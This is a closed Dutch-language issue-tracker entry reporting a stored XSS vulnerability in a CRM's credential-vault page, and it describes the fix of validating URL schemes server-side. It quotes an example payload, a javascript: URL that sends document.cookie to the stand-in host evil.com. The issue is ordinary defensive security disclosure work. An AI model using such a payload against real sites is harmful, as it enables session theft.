F-02: Stored XSS in wachtwoordkluis (`javascript:`-URL) #112

New issue

Closed

opened 2026-05-26 18:23:43 +00:00 by jesse-a · 1 comment

jesse-a commented

2026-05-26 18:23:43 +00:00

Owner

Severity: HIGH

Het url-veld van een CustomerCredential werd niet gevalideerd. Een MANAGER kon een credential opslaan met URL javascript:fetch('//evil.com?cookie='+document.cookie) — wanneer een andere user de kluis-pagina opende en op de link klikte, executed het script in de CRM-origin.

Fix: server-side URL-validatie (alleen http:///https:// schemes); CredentialVault-component rendert oude/onveilige URLs nu als platte tekst i.p.v. klikbare link.

**Severity: HIGH** Het `url`-veld van een CustomerCredential werd niet gevalideerd. Een MANAGER kon een credential opslaan met URL `javascript:fetch('//evil.com?cookie='+document.cookie)` — wanneer een andere user de kluis-pagina opende en op de link klikte, executed het script in de CRM-origin. **Fix**: server-side URL-validatie (alleen `http://`/`https://` schemes); `CredentialVault`-component rendert oude/onveilige URLs nu als platte tekst i.p.v. klikbare link.

jesse-a added the

fixed

security

severity-high

labels

2026-05-26 18:23:44 +00:00

jesse-a commented

2026-05-26 18:23:44 +00:00

Author

Owner

Opgelost in commit 4d080f2.

Opgelost in commit 4d080f2.